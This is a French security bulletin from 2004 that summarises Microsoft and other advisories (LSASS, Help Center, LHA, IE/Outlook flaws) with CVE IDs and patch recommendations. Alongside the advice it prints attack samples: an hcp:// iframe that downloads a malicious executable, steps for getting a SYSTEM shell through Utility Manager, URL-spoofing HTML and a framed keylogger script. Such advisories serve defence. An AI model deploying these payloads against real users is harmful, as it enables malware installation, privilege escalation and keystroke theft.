Base OSWIN v2

Avis Microsoft

14 failles ont été identifiées (!) :

1. Débordement de buffer dans LSASS, exploitable à distance
   CAN-2003-0533
   http://www.securityfocus.com/bid/10108
   
   Source : Carlos Sarraute / Core Security Technologies, eEye
   
2. Déni de service sur LDAP, exploitable à distance
   CAN-2003-0663
   http://www.securityfocus.com/bid/10114
   
3. Débordement de buffer dans PCT (Private Communications Transport, un module de la librairie SSL), exploitable à distance sur tout module Windows utilisant SSL
   CAN-2003-0719
   http://www.securityfocus.com/bid/10116
   
   Source : Internet Security Systems
   
4. Débordement de buffer dans Winlogon, exploitable à distance
   CAN-2003-0806
   http://www.securityfocus.com/bid/10126
   
   Source : Ondrej Sevecek
   
5. Débordement de buffer dans le gestionnaire de fichiers Metafile (.EMF), exploitable par le biais d'une image incluse dans une page Web, un email ou un document
   CAN-2003-0906
   http://www.securityfocus.com/bid/10120
   
   Source : eEye
   
6. Vulnérabilité dans le "Help and Support Center", exploitable via une page Web ou un email contenant un lien hcp:// pour injecter des scripts en zone poste de travail
   CAN-2003-0907
   http://www.securityfocus.com/bid/10119
   
   Source : iDefense, Jouko Pynnönen
   
7. Vulnérabilité dans l'"Utility Manager", exploitable localement pour obtenir les droits SYSTEM
   CAN-2003-0908
   http://www.securityfocus.com/bid/10124
   
   Source : Brett Moore / Security-Assessment, Cesar Cerrudo, Ben Pryor
   
8. Vulnérabilité dans le composant "Windows Management", exploitable localement pour obtenir les droits SYSTEM
   CAN-2003-0909
   http://www.securityfocus.com/bid/10125
   
   Source : Erik Kamphuis / LogicaCMG (en partenariat avec les impôts Hollandais)
   
9. Vulnérabilité dans la gestion de la "Local Descriptor Table" (LDT), exploitable localement pour lire et écrire dans la mémoire du noyau (et obtenir les droits SYSTEM)
   CAN-2003-0910
   http://www.securityfocus.com/bid/10122
   
   Source : eEye
   
10. Débordement de buffer dans le gestionnaire de protocole H.323, exploitable à distance
    CAN-2004-0117
    http://www.securityfocus.com/bid/10111
    
11. Vulnérabilité dans la "Virtual DOS Machine", exploitable localement pour lire et écrire dans la mémoire du noyau (et obtenir les droits SYSTEM)
    CAN-2004-0118
    http://www.securityfocus.com/bid/10117
    
    Source : eEye
    
12. Débordement de buffer dans la négociation SSP (Security Support Provider), exploitable à distance
    CAN-2004-0119
    http://www.securityfocus.com/bid/10113
    
    Source : NSFOCUS Security Team (http://www.nsfocus.com/english/homepage/research/0401.htm)
    
13. Vulnérabilité SSL, exploitable à distance
    CAN-2004-0120
    http://www.securityfocus.com/bid/10115
    
    Source : John Lampe / Tenable Network Security
    
14. Vulnérabilité de type "double free" dans le parseur ASN.1, exploitable à distance
    CAN-2004-0123
    http://www.securityfocus.com/bid/10118
    
    Source : Foundstone, Qualys

Les failles 1, 3, 5, 6, 7, 9, 11, 12, 13 ont été documentées en détail et peuvent faire l'objet d'une exploitation active.

La faille n°1 est exploitée par le ver Sasser.

La faille n°7 est particulièrement simple à mettre en oeuvre : sous Windows XP, appeller l'Utility Manager avec "Windows + U", faire "Aide", "Atteindre une URL", "CMD.EXE" pour obtenir un shell SYSTEM.

Ce patch corrige de nombreuses vulnérabilités critiques et devrait être appliqué sur tous les postes et serveurs.

L'une de ces vulnérabilités est activement exploitée par le ver Sasser.

Toutefois des effets de bord importants ont été mentionnés dans les groupes de discussion sur Internet, il faut donc appliquer ce correctif avec prudence. Il est regrettable que Microsoft ne fournisse pas de correctif individuel pour chacune des vulnérabilités identifiées, car toutes ne sont pas de même niveau.

4 nouvelles vulnérabilités impactant les protocoles RPC et/ou DCOM ont été publiées :

1. Déni de service via RPC, lorsque le patch MS03-039 est installé
   CAN-2003-0813
   
   Source : eEye
   
2. Déni de service sur RPCSS
   CAN-2004-0116
   http://www.securityfocus.com/bid/10127
   
   Source : eEye
   
3. Déni de service via RPC sur HTTP
   CAN-2003-0807
   http://www.securityfocus.com/bid/10123
   
   Source : Qualys
   
4. Divulgation d'information via un appel "Object Identity"
   CAN-2004-0124
   http://www.securityfocus.com/bid/10121
   
   Source : Todd Sabin / BindView

Les failles 1 et 2 ont été documentées en détail et peuvent faire l'objet d'une exploitation active.

Il est recommandé d'appliquer ces patchs afin d'améliorer la stabilité du système RPC/DCOM, (trop) rapidement patché après la propagation du ver Blaster.

Exécution de code en zone poste de travail via une page Web ou un email malformé.

Cette famille de bogues est sérieuse et facile à exploiter. Elle est utilisée par de nombreux codes malveillants (virus mais aussi spywares). Cette vulnérabilité peut être activée par un lien "ms-its:", même si le client par défaut n'est ni IE ni OE.

Il est fortement recommandé d'appliquer ce patch.

Moteur Jet 4.0, fourni en standard dans Windows NT4, 2000, XP, 2003.

Débordement de buffer dans le moteur de base de données Jet.
CAN-2004-0197
http://www.securityfocus.com/bid/10112

Ce débordement de buffer est exploitable à distance, par l'envoi d'une réponse malformée à un "broadcast" Jet. Ces broadcasts sont émis lorsque le moteur Jet cherche à se connecter à une base de données distante.

Ce bogue est difficilement exploitable par un virus ou un ver, car il n'est exploitable qu'en réponse à une action du client sur le réseau local.

<iframe src="hcp://system/DVDUpgrd/dvdupgrd.htm?website=site.com/malicieux.exe" width="1" height="1"></iframe>

La fonction "Centre d'Aide et du Support" a fait l'objet de nombreux avis de sécurité. Elle est peu utilisée et gagnerait à pouvoir être désactivée.

Cette vulnérabilité peut être exploitée par un virus, il est donc recommandé d'appliquer le correctif. L'impact sur les fonctionnalités du système sera limité, car la fonction "Centre d'Aide et du Support" est de totue façon peu usitée en entreprise.

Autres avis

CAN-2004-0234, CAN-2004-0235
Avril 2004

Tout produit basé sur le moteur LHA public, en particulier les outils antivirus.

2 "buffer overflow" exploitables,
2 "directory traversal" permettant de sortir du chemin de décompression d'origine.

Des preuves de concept permettant d'exécuter du code lors de l'utilisation de la commande LHA sous Linux ont été publiés sur Internet.

Le format de compression LHA n'est quasiment plus utilisé, mais tous les outils antivirus le supporte.

Ces bogues sont graves, car ils permettent d'exécuter du code conçu par l'attaquant lors du contrôle antivirus d'une archive LHA soit sur le client final, soit sur la passerelle de messagerie.

Tous les éditeurs affectés doivent mettre à jour leurs produits. En attendant il est fortement recommandé de détruire toute pièce jointe LHA avant toute forme d'analyse antivirus.

1. http://www.securityfocus.com/bid/9924
2. http://www.securityfocus.com/bid/10023
3. http://www.securityfocus.com/bid/10056
4. http://www.securityfocus.com/bid/10057
5. http://www.securityfocus.com/bid/10073
6. http://www.securityfocus.com/bid/10097
7. http://www.securityfocus.com/bid/10098
8. http://www.securityfocus.com/bid/10144
9. http://www.securityfocus.com/bid/10248
10. http://www.securityfocus.com/bid/10308
11. http://www.securityfocus.com/bid/10345

Tous publiés entre avril et mai 2004

1. Déni de service de l'explorateur Windows
2. Modification de la barre de statut via un formulaire
3. Débordement de buffer dans le composant MSWebDVD
4. Déni de service IE via Flash Player
5. Crash IE trivial
6. "Bombe" BMP (58 octets -> 51,539,607,528 octets)
7. Crash OE en l'absence d'en-tête "FROM:"
8. Crash OE/Outlook en présence d'un caractère NULL
9. Spoofing SSL via le tag META REFRESH
10. Masquage d'URL via un "imagemap"
11. Masquage d'URL dans OE

1. shell://[...].exe
2. http://www.malware.com/not-so-good.zip
3. N/D
4. LoadMovie 1,"xxx.swf"
5. <iframe src="?">
6. http://www.4rman.com/exploits/tinybmp.htm
7. http://www.4rman.com/exploits/whosendthis.zip
8. Créer un message avec un caractère NULL
9. <HTML><HEAD>
   <meta http-equiv="REFRESH" content="0;url=https://www.example.com/">
   </HEAD><BODY onUnload='window.location=""'></BODY></HTML>
10. http://www.kurczaba.com/securityadvisories/0405132poc.htm
11. <BASE href=http://www.example1.com target=_top>
    <A href="http://www.example2.com">http://www.example1.com</A>

Il devient difficile de suivre les vulnérabilités IE/OE/Outlook ...

1. http://www.malware.com/shell.game.html
2. http://www.acrossecurity.com/aspr/ASPR-2004-01-20-1-PUB.txt
3. N/D

Tous publiés entre avril et mai 2004

1. Cross-zone scripting
2. Déni de service IE/OE/Outlook
3. IE permet d'imprimer sans confirmation :-)

1. <a href="shell:Cache">
2. http://<hostname>%00%00
3. window.print()

Il devient difficile de suivre les vulnérabilités IE/OE/Outlook ...

Débordement de buffer exploitable lorsque le client Windows essaie de se connecter à un serveur SMB avec des noms de répertoire arbitrairement longs.

(Ce bogue ne peut être exploité que si le serveur distant autorise les noms de répertoire arbitrairement longs, ce qui est le cas de Samba).

Ce bogue n'est pas exploitable par un virus ou un ver, il ne peut être utilisé que sur un LAN dans le cas d'une intrusion manuelle ciblée.

Bien qu'anecdotique en termes d'exploitation "grandeur nature", ce bogue est un cas d'école en ce qui concerne les risques liés aux bibliothèques partagées, a fortiori lorsque celles-ci proviennent du compilateur !

Malgré leur simplicité de détection, les bogues de cross-site scripting ne sont pas en voie d'exctinction ...

En l'absence de détails techniques, cette faille est difficilement qualifiable.

De manière générale il est souhaitable d'utiliser un Reverse Proxy et de filtrer en sortie les messages d'erreur, surtout lorsque ceux-ci contiennent des mots clés de type "C:\".

<img src="malware.htm" style="display:none"> : charge "malware.htm" dans un répertoire prédictible.

Cette faille en soi n'est pas dangereuse, mais la possibilité pour l'attaquant de télécharger des scripts à un emplacement prédictible est un prérequis à l'exploitation de beaucoup de failles IE/OE/Outlook.

Fuite d'information.

Outlook 2003 possède une option (activée par défaut) permettant d'interdire le chargement des éléments externes au message (images liées). Cette technique est souvent utilisée par les spammeurs pour confirmer la lecture d'un message.

<v:vml frame style="LEFT: 50px; WIDTH: 300px; POSITION: relative; TOP: 30px; HEIGHT: 200px" src = "http://www.example.com/duh.txt#malware"></v:vmlframe>
<HTML><HEAD>
<STYLE>v\:* { behavior: url(#default#VML); } </STYLE>
<XML:NAMESPACE NS="urn:schemas-microsoft-com:vml" PREFIX="v"/>
</HEAD></HTML>

N/D

N/D

http://www.malware.com/eml.zip

MIME-Version: 1.0
Content-Type: application/x-zip-compressed
Content-Transfer-Encoding: binary
X-Source: 06.03.04 http://www.malware.com
PK…

Cette faille en soi n'est pas dangereuse, sauf si l'environnement d'exécution du client souffre d'un bogue permettant d'exécuter directement le contenu d'un fichier ZIP ou que le client lui-même est victime d'un tel bogue ...

<html><head><script>
var keylog=''; document.onkeypress = function ()
{ k = window.event.keyCode; window.status = keylog += String.fromCharCode(k) + '[' + k +']'; }
</script></head>
<frameset onLoad="this.focus();" onBlur="this.focus();" cols="100%,*">
<frame src="http://www.idefense.com/register.jsp" scrolling="auto">
</frameset></html>

N/D

Nouveaux outils

Autres infos